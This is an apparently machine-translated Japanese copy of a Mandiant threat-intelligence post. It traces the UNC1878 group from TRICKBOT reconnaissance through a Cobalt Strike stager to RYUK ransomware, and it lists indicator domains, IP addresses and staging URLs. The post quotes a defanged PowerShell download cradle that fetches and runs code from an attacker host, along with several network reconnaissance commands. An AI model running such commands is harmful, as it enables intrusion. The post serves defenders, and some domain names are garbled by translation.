新しい侵入を発見すると、活動セット全体を理解するのに役立つ質問を自問します。
この活動はどのくらい一般的ですか?このマルウェアまたはキャンペーンに何かユニークまたは特別な点はありますか? TTP またはインフラストラクチャに関して、何が新しく、何が古いのでしょうか?これはどこかで見られますか?この脅威アクターの性質を裏付ける情報はありますか?
動きの速い敵を長期にわたって追跡するために、侵入データを活用し、他のデータ セットにピボットして、その知識をアナリストやインシデント レスポンダーが実行できるようにし、攻撃者に関する新しい発見と評価を可能にします。 FireEye Advanced Practices チームは、攻撃者について誰よりも詳しく知るために存在し、このような質問をして回答することで、セキュリティ対策におけるアナリストの行動を可能にします。このブログ投稿では、FireEye のグローバル データ セット全体で、金銭目的の攻撃者を追跡するために、識別、拡大、および発見のサイクルがどのように使用されたかについて説明します。
身元
2020 年 1 月 29 日、 FireEye Managed Defenseは、米国を拠点とするクライアントに対する複数の TRICKBOT の展開を調査しました。初期展開の直後に、TRICKBOT の networkDll モジュールは次のネットワーク偵察コマンドを実行しました (図 1)。
ipconfig /すべて ネット構成ワークステーション ネットビュー/すべて ネット ビュー /すべて /ドメイン nltest /domain_trusts nltest /domain_trusts /all_trusts |
図 1: 初期偵察
偵察から約 20 分後、攻撃者は PowerShell コマンドを実行して、Cobalt Strike HTTPS BEACON ステージャーをメモリにダウンロードして実行しました (図 2)。
cmd.exe /c powershell.exe -nop –w hidden –c “IEX ((new-object net.webclient).downloadstring(‘hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt’))” |
図 2: Cobalt Strike ステージャーを要求するために使用される PowerShell ダウンロード クレードル
6 分後、Managed Defense は列挙の証拠を特定し、BEACON インプラントを介して横方向の動きを試みました。 Managed Defense はクライアントに活動を警告し、影響を受けたホストを封じ込め、侵入を阻止しました。 TRICKBOT の感染と横方向の動きの試みの間の約 46 分の差分は非常に異常であり、巧妙なマスカレード ドメインとともに、私たちのチームによるさらなる調査が必要でした。
軽量ではありますが、この侵入による兆候は、UNC1878 と呼ばれる未分類の脅威グループを作成するのに十分なほど明確でした。最初のクラスタリングの時点では、Managed Defense による侵入の迅速な封じ込めにより、UNC1878 の意図は完全には理解されていませんでした。このラベルを作成することで、マネージド ディフェンスの調査からの活動を 1 つのエンティティに関連付けることができるため、このグループの理解を深め、彼らの活動を経時的に追跡することができます。これは、大規模なマルウェアが関与するキャンペーンに対処する場合に特に重要です。これは、利用しているマルウェア キャンペーンからインタラクティブなアクターを区別するのに役立つからです。クラスタリング手法の詳細については 、これらのクラスターを大規模に分析、分離、またはマージする方法に関する投稿をご覧ください。
拡張
コマンド アンド コントロール (C2) ドメインにピボットすることで、UNC1878 ネットワーク インフラストラクチャのプロファイルの構築を開始することができました。 cylenceprotect[.]com の WHOIS レコード (図 3) は、ドメインが 2020 年 1 月 27 日にレジストラ「Hosting Concepts BV d/b/a Openprovider」に登録されたことを明らかにしました。これは、このドメインが Managed Defense の顧客に影響を与える活動で使用されているのを確認する 2 日も経たないうちのことです。
ドメイン名: cylenceprotect.com レジストリ ドメイン ID: 2485487352_DOMAIN_COM-VRSN レジストラ WHOIS サーバー: whois.registrar.eu レジストラ URL: http://www.registrar.eu 更新日: 2020-01-28T00:35:43Z 作成日: 2020-01-27T23:32:18Z レジストラ登録有効期限: 2021-01-27T23:32:18Z レジストラ: Hosting Concepts BV d/b/a Openprovider |
図 3: ドメイン cylenceprotect[.]com の WHOIS レコード
サーバーに注目すると、ドメインは 45.76.20.140 に解決されました。これは、VPS プロバイダー Choopa が所有する IP アドレスです。さらに、ドメインは自己ホスト型のネーム サーバー ns1.cylenceprotect[.]com および ns2.cylenceprotect[.]com を使用し、これも Choopa IP アドレスに解決されました。サーバーのネットワーク スキャン データにより、ポート 80 と 443 で証明書が検出されました。その一部を図 4 に示します。
証明書: データ: バージョン: 3 (0x2) シリアルナンバー: 03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0 署名アルゴリズム: sha256WithRSAEncryption 発行者: C=US、O=Let’s Encrypt、CN=Let’s Encrypt Authority X3 有効 以前: 2020 年 1 月 28 日 02:02:14 GMT 後 : 2020 年 4 月 27 日 02:02:14 GMT 件名: CN=cylenceprotect[.]com |
図 4: ドメイン cylenceprotect[.]com の TLS 証明書
証明書は Let’s Encrypt によって発行されたもので、最も早い有効期限は Managed Defense によって検出されたアクティビティから 24 時間以内であり、この脅威アクターが動作する速度を実証しています。図 4 の証明書とともに、ポート 54546 (デフォルトでは 50050) で生成されたデフォルトの自己署名 Cobalt Strike 証明書 (図 5) も特定しました。
証明書: データ: バージョン: 3 (0x2) シリアル番号: 1843990795 (0x6de9110b) 署名アルゴリズム: sha256WithRSAEncryption 発行者: C=Earth、ST=Cyberspace、L=Somewhere、O=cobaltstrike、OU=AdvancedPenTesting、CN=Major Cobalt Strike 有効 以前: 2020 年 1 月 28 日 03:06:30 GMT 後 : 2020 年 4 月 27 日 03:06:30 GMT 件名: C=地球、ST=サイバースペース、L=どこか、O=cobaltstrike、OU=AdvancedPenTesting、CN=Major Cobalt Strike |
図 5: UNC1878 で使用されるデフォルトの Cobalt Strike TLS 証明書
ポート 80 および 443 の証明書と同様に、最も早い有効期限は、Managed Defense によって特定された侵入から 24 時間以内でした。サーバーでの分析を続けると、BEACON ステージャーとそれに続く BEACON ペイロードが取得されました。これは、 Amazon 可鍛性 C2 プロファイルを使用するように構成されていました。
これらの指標は、単独ではそれほど重要ではないかもしれませんが、これらを組み合わせることで、関連するインフラストラクチャの積極的な発見を促進する認識可能なパターンが作成されます。私たちは、UNC1878 で使用されているものと同じ特性を示すサーバーを探し始めました。サードパーティのスキャン データを使用して、UNC1878 トレードクラフトの優勢に一致する追加のサーバーをすばやく特定しました。
- ドメインは通常、「更新」、「システム」、「サービス」などの一般的な IT またはセキュリティ関連の用語で構成されます。
- 2019 年 12 月 19 日に「Hosting Concepts BV d/b/a Openprovider」に登録されたドメイン。
- 自己ホスト型ネーム サーバー。
- ポート 80 で証明書を暗号化しましょう。
- 主にChoopaがホストする仮想プライベートサーバー。
- Amazon 可鍛性 C2 プロファイルで構成された BEACON ペイロード。
- 非標準ポートの Cobalt Strike Teams サーバー。
UNC1878 トレードクラフトと一致する証明書に加えて、アーミテージの自己署名証明書も発見しました。これは、このグループが複数の攻撃的なセキュリティ ツールを使用している可能性があることを示しています。
1 回の Managed Defense への侵入から抽出された限られた指標に基づいて、活動の小さなクラスターが UNC1878 に重要なより多様な指標のセットに拡張されました。この脅威アクターの目的と目標はまだ明らかにされていませんでしたが、インフラストラクチャの相互関係により、私たちのチームはこの脅威アクターの他の顧客に対する操作を認識することができました。
発見
UNC1878 の確立された手口により、私たちのチームは、次の週にFireEye Mandiantの調査をサポートするために、いくつかの関連する侵入を迅速に特定しました。最初のマネージド ディフェンス調査から UNC1878 の最初のクラスタリングと拡張を行ってから 2 日以内に、Mandiant Incident Responders は、以前に特定して UNC1878 に起因するいくつかの指標を使用して、米国に拠点を置く医療機器会社での活動を調査していました。関連付けられたドメイン、ペイロード、および方法論により、コンサルタントは検出を構築するためのベースライン、および攻撃者の能力と動作速度に対する信頼レベルを得ることができました。
3 日後、レストラン チェーンでの別のインシデント対応作業中に UNC1878 が特定されました。この取り組みで、Mandiant のコンサルタントは、何百ものシステムに RYUK ランサムウェアを展開しようとした証拠を発見し、最終的に UNC1878 の望ましい最終目標を明らかにしました。その後の数週間、Mandiant Incident Response および Managed Defense の複数の顧客への侵入のさまざまな段階で、UNC1878 に遭遇し続けました。
サービス データからこれらの侵入を深く理解することができますが、製品のテレメトリを使用して活動の幅を理解し、この脅威アクターの世界的な蔓延についてより良い世界観と展望を得ることができます。これにより、テクノロジー企業での UNC1878 侵入が発見され、Mandiant は影響を受けた顧客に直ちに通知しました。複数の UNC1878 侵入を当社のサービスと製品の顧客に関連付けることで、標的が無差別であることが明らかになりました。これは、日和見型ランサムウェア キャンペーンの共通の特徴です。
最初は UNC1878 の意図をめぐる未回答の疑問がありましたが、コンサルタントやアナリストにその機能に関する貴重な洞察を提供することができました。次に、これらの関与中に収集された侵入データは、UNC1878 のトレードクラフトに関する理解を深めるサイクルを継続し、差し迫ったランサムウェアの展開に直面して、レスポンダーがこれらのインシデントを迅速に処理できるようにしました。
結論
脅威アクターは引き続き大量のマルウェア キャンペーンを使用して標的環境への足場を確立し、続いて RYUK、DOPPLEPAYMER、MAZE などのランサムウェアの展開に焦点を当てたインタラクティブな操作を行います。 FireEye が対応する侵入の全体的な傾向を見ると、従来の PCI 窃盗からランサムウェアへの移行の拡大により、UNC1878 などの脅威アクターはその範囲を広げてテンポを上げ、ビジネスの中断と身代金の支払いにより組織に数百万ドルの損害を与えています。ただし、UNC1878 は、その速度を除けば、この傾向に従って増加しているグループの中で際立っているわけではなく、このブログ投稿の重要なポイントではありません。
UNC1878 に使用される分析と発見のサイクルは、影響力のある攻撃者を大規模に迅速に検出して追跡するという私たちのチームの使命の中核にあります。 Managed Defense クライアントでの単一の侵入から始まり、複数の顧客で UNC1878 アクティビティを発見することができました。彼らの活動の初期段階の分析を使用することで、他の点では関係のない調査でこの攻撃者をピボットして追跡することができました。 UNC1878 のトレードクラフトに対する理解を深めて拡大するにつれて、私たちのチームは、Mandiant と Managed Defense が、標的の組織を機能不全に陥れる可能性のある金銭目的の脅威アクターを効率的に特定、対応、根絶できるようにします。このアクターを追跡するために適用される原則は、あらゆる敵対者を追跡するために不可欠であり、最終的には高度な実践チームが FireEye エコシステム全体で意味のある活動を明らかにする方法です。
謝辞
このコンテンツのテクニカル レビューについて、Andrew Thompson、Dan Perez、Steve Miller、John Gorman、および Brendan McKeague に感謝します。さらに、私たちの調査を可能にする貴重な侵入データを収集している最前線のレスポンダーに感謝します。
侵害の痕跡
ドメイン
- aatus[.]com
- avrenew[.]com
- besttus[.]com
- bigtus[.]com
- ブレインシャンピオン[.]com
- checkwinupdate[.]com
- ciscocheckapi[.]com
- cleardefencewin[.]com
- cmdupdatewin[.]com
- comssite[.]com
- conhostservice[.]com
- サイレンスプロテクト[.]com
- defenswin[.]com
- easytus[.]com
- findtus[.]com
- firsttus[.]com
- freeallsafe[.]com
- freeoldsafe[.]com
- グレートタス[.]com
- havesetup[.]net
- iexploreservice[.]com
- ジョマンバ[.]ベスト
- livecheckpointsrs[.]com
- livetus[.]com
- lsassupdate[.]com
- lsasswininfo[.]com
- microsoftupdateswin[.]com
- myservicebooster[.]com
- myservicebooster[.]net
- myserviceconnect[.]net
- myserviceupdater[.]com
- myyserviceupdater[.]com
- renovatesystem[.]com
- サービスアップデーター[.]com
- servicesbooster[.]com
- servicesbooster[.]org
- サービスセキュリティ[.]組織
- serviceshelpers[.]com
- サービスアップデート[.]ネット
- serviceuphelper[.]com
- sophosdefence[.]com
- ターゲット サポート[.]オンライン
- タスクスケジュールwin[.]com
- タイムシフト[.]com
- topsecurityservice[.]net
- topservicehelper[.]com
- topservicesbooster[.]com
- topservicesecurity[.]com
- トップサービスセキュリティ[.]ネット
- topservicesecurity[.]org
- topservicesupdate[.]com
- topservicesupdates[.]com
- topserviceupdater[.]com
- update-wind[.]com
- updatemanager[.]us
- updatewinlsass[.]com
- updatewinsoftr[.]com
- ウェブ分析[.]ライブ
- winddefenceinfo[.]com
- windefens[.]com
- winsysteminfo[.]com
- winsystemupdate[.]com
- worldtus[.]com
- yoursuperservice[.]com
IP アドレス
- 31.7.59.141
- 45.32.30.162
- 45.32.130.5
- 45.32.161.213
- 45.32.170.9
- 45.63.8.219
- 45.63.95.187
- 45.76.20.140
- 45.76.167.35
- 45.76.231.195
- 45.77.58.172
- 45.77.89.31
- 45.77.98.157
- 45.77.119.212
- 45.77.153.72
- 45.77.206.105
- 63.209.33.131
- 66.42.97.225
- 66.42.99.79
- 79.124.60.117
- 80.240.18.106
- 81.17.25.210
- 95.179.147.215
- 95.179.210.8
- 95.179.215.228
- 96.30.192.141
- 96.30.193.57
- 104.156.227.250
- 104.156.245.0
- 104.156.250.132
- 104.156.255.79
- 104.238.140.239
- 104.238.190.126
- 108.61.72.29
- 108.61.90.90
- 108.61.176.237
- 108.61.209.123
- 108.61.242.184
- 140.82.5.67
- 140.82.10.222
- 140.82.27.146
- 140.82.60.155
- 144.202.12.197
- 144.202.83.4
- 149.28.15.247
- 149.28.35.35
- 149.28.50.31
- 149.28.55.197
- 149.28.81.19
- 149.28.113.9
- 149.28.122.130
- 149.28.246.25
- 149.248.5.240
- 149.248.56.113
- 149.248.58.11
- 151.106.56.223
- 155.138.135.182
- 155.138.214.247
- 155.138.216.133
- 155.138.224.221
- 207.148.8.61
- 207.148.15.31
- 207.148.21.17
- 207.246.67.70
- 209.222.108.106
- 209.250.255.172
- 216.155.157.249
- 217.69.15.175
BEACON ステージング URL
- hxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk
- hxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds
- hxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1
- hxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeuyenfgx
- hxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg
- hxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90
- hxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu
- hxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl
- hxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge
- hxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa
- hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt
- hxxps://havesetup[.]net/afgthyjuhtgrfety
- hxxps://servicesbooster[.]org:443/sfer4f54
- hxxps://servicesecurity[.]org:443/fuhvbjk
- hxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft
- hxxps://timesshifts[.]com:443/ry56rt6yh5rth
- hxxps://update-wind[.]com/aergerhgrhgeradgerg
- hxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf
参照: https://www.mandiant.com/resources/blog/the-cycle-of-adversary-pursuit
Comments